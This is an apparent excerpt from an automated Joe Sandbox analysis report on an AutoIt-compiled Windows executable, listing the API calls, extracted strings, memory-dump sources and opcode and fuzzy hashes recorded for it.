                                                                • htons.WSOCK32(00000000,?,00000000), ref: 0033A88B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: htonsinet_addr
                                                                • String ID: 255.255.255.255
                                                                • API String ID: 3832099526-2422070025
                                                                • Opcode ID: ff5393fc570f1a95a4f2f86b43966137dff1e04a4829eb9c4329367fbeaf1062
                                                                • Instruction ID: 2f58d6eb2cbc17bd9491626018afc977c2c082700fb803cebb881ca6ffbfd964
                                                                • Opcode Fuzzy Hash: ff5393fc570f1a95a4f2f86b43966137dff1e04a4829eb9c4329367fbeaf1062
                                                                • Instruction Fuzzy Hash: EE01F575600304ABCB229F68C8C6FEDB768EF44314F10852AF556AF2D1D772E802C752
                                                                APIs
                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0031B7EF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 3850602802-1403004172
                                                                • Opcode ID: 08074ff674f518ecc139e1cc377e8ac01b044fb5345c456fc2f67cf9be8f610e
                                                                • Instruction ID: 786a0b6e7c5400bc2f28e69136978e3a35d2474b3070ae3bab4cf17d898091dc
                                                                • Opcode Fuzzy Hash: 08074ff674f518ecc139e1cc377e8ac01b044fb5345c456fc2f67cf9be8f610e
                                                                • Instruction Fuzzy Hash: 8E014771650154ABCB0AEBA8CC42DFE736EBF0A310B54061CF462672C2EF7058188BA0
                                                                APIs
                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 0031B6EB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 3850602802-1403004172
                                                                • Opcode ID: 1d233f52a0aff074bfc7dabab6346c54166edbda8b3cd98fd42817776d0ded05
                                                                • Instruction ID: 52eebe6053549d4593c1de9adf43437256c0713124e5813573cc6124522ff128
                                                                • Opcode Fuzzy Hash: 1d233f52a0aff074bfc7dabab6346c54166edbda8b3cd98fd42817776d0ded05
                                                                • Instruction Fuzzy Hash: 1A01A271A81004ABCB0AEBA5C952AFF73AD9F1A344F64001DF402B7281DF945E298BB5
                                                                APIs
                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 0031B76C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 3850602802-1403004172
                                                                • Opcode ID: 922b97fa98ec51859a6bda6993689597aaa1322f1d0106e883e068b8e6b18d59
                                                                • Instruction ID: 520abbd76c792431b5623d27a66abb2bb74f32f6362107fefc598157878bfc88
                                                                • Opcode Fuzzy Hash: 922b97fa98ec51859a6bda6993689597aaa1322f1d0106e883e068b8e6b18d59
                                                                • Instruction Fuzzy Hash: FF018675681104BBDB0AE7A4C952EFF73AD9F0A344F640019F401B32D2DB645E598BB5
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __calloc_crt
                                                                • String ID: ":
                                                                • API String ID: 3494438863-2240744206
                                                                • Opcode ID: cb00cdba19d1d01bc73db41941a5a4a4ffc957f35caeeffd318b94fa824c33cd
                                                                • Instruction ID: 067f296e5da6e16afd0f9488c788ad2acc2a4b892c3ef26a623c88bc09401a5f
                                                                • Opcode Fuzzy Hash: cb00cdba19d1d01bc73db41941a5a4a4ffc957f35caeeffd318b94fa824c33cd
                                                                • Instruction Fuzzy Hash: 95F0C2B120A6029EE7679B1DBC617A767D8E745720F10491BF304CE6C6E730CA818A94
                                                                APIs
                                                                • LoadImageW.USER32(002E0000,00000063,00000001,00000010,00000010,00000000), ref: 002E4048
                                                                • EnumResourceNamesW.KERNEL32(00000000,0000000E,003267E9,00000063,00000000,75A50280,?,?,002E3EE1,?,?,000000FF), ref: 003541B3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: EnumImageLoadNamesResource
                                                                • String ID: >.
                                                                • API String ID: 1578290342-2032304686
                                                                • Opcode ID: be8fb4f854b0a442dd70a0a110d881b227eed3e67464bc26a4a34d56e5b32a22
                                                                • Instruction ID: 9bd988d5893eb85c6d72e6e3c0f0390741312b41b84785de5a25d8585ee97269
                                                                • Opcode Fuzzy Hash: be8fb4f854b0a442dd70a0a110d881b227eed3e67464bc26a4a34d56e5b32a22
                                                                • Instruction Fuzzy Hash: E1F09031750364B7E2219B1AFC4AFD33BADE706BB5F104506F715AA1E0D3F090808B90
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ClassName_wcscmp
                                                                • String ID: #32770
                                                                • API String ID: 2292705959-463685578
                                                                • Opcode ID: 3920edacee0bbc3020eaddb27b19320f402aceaa78da902323f2956e4e816d7b
                                                                • Instruction ID: ba93d23c867bf2121ac98e2cb7ba925d487b08b4ed34ed4d9efd7a2db9c152a9
                                                                • Opcode Fuzzy Hash: 3920edacee0bbc3020eaddb27b19320f402aceaa78da902323f2956e4e816d7b
                                                                • Instruction Fuzzy Hash: 84E0D877A0432527DB21EAA9EC49FD7FBACFB56760F010016F905D7081D6B0E60187D4
                                                                APIs
                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0031A63F
                                                                  • Part of subcall function 003013F1: _doexit.LIBCMT ref: 003013FB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Message_doexit
                                                                • String ID: AutoIt$Error allocating memory.
                                                                • API String ID: 1993061046-4017498283
                                                                • Opcode ID: 86746f2cb107561a445d8206e0e6afaa8951465b469956487555613be0f4628f
                                                                • Instruction ID: 0ce96c977a83a431187cdfc51362388e2fd3cf661467afe030f0e1cd5d8cf95b
                                                                • Opcode Fuzzy Hash: 86746f2cb107561a445d8206e0e6afaa8951465b469956487555613be0f4628f
                                                                • Instruction Fuzzy Hash: DBD02B313C572833C22636A96C17FC5764C8F04B95F044025FB0C991C24DD2859001E9
                                                                APIs
                                                                • GetSystemDirectoryW.KERNEL32(?), ref: 0035ACC0
                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0035AEBD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: DirectoryFreeLibrarySystem
                                                                • String ID: WIN_XPe
                                                                • API String ID: 510247158-3257408948
                                                                • Opcode ID: ea480457c9db31abb427863de2cc948c0b074f877113bf3ef9178880bb389f46
                                                                • Instruction ID: 888c5559bd0de5edc9ff768e358f6d7ab94ecf7ecaee3ea56013f3bbaa14e16e
                                                                • Opcode Fuzzy Hash: ea480457c9db31abb427863de2cc948c0b074f877113bf3ef9178880bb389f46
                                                                • Instruction Fuzzy Hash: 6CE03970C109099FCB13DBA8D984DECF7BCAB48702F108181E522B2570CBB05A88EF22
                                                                APIs
                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003486A2
                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003486B5
                                                                  • Part of subcall function 00327A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00327AD0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: FindMessagePostSleepWindow
                                                                • String ID: Shell_TrayWnd
                                                                • API String ID: 529655941-2988720461
                                                                • Opcode ID: 4160672a4d18687030f89f9671fb2a0c6123d4eae322ed99d14791b5d3feb698
                                                                • Instruction ID: 1489b2883596b2ef2cba4b8e436d8672f4ce1862194fafd077fabe5c6aeab8a2
                                                                • Opcode Fuzzy Hash: 4160672a4d18687030f89f9671fb2a0c6123d4eae322ed99d14791b5d3feb698
                                                                • Instruction Fuzzy Hash: DED01275B85324B7E6766770EC0FFC67A1CAB05B21F114819F74AAA1D0C9E0E940C754
                                                                APIs
                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003486E2
                                                                • PostMessageW.USER32(00000000), ref: 003486E9
                                                                  • Part of subcall function 00327A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00327AD0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: FindMessagePostSleepWindow
                                                                • String ID: Shell_TrayWnd
                                                                • API String ID: 529655941-2988720461
                                                                • Opcode ID: ada83533ab8e57db312cad653cbb452f70817e1fbbc0a91e2ba27368c7d37a19
                                                                • Instruction ID: 9d6b82f507deb520e4dedca2a1ffc08e287cc5b0ccf6bbea58cba716ccd8d121
                                                                • Opcode Fuzzy Hash: ada83533ab8e57db312cad653cbb452f70817e1fbbc0a91e2ba27368c7d37a19
                                                                • Instruction Fuzzy Hash: 86D0C971B853247BE6666770AC0BFC66A18AB0AB21F514819F746AA1D0C9E0A9408659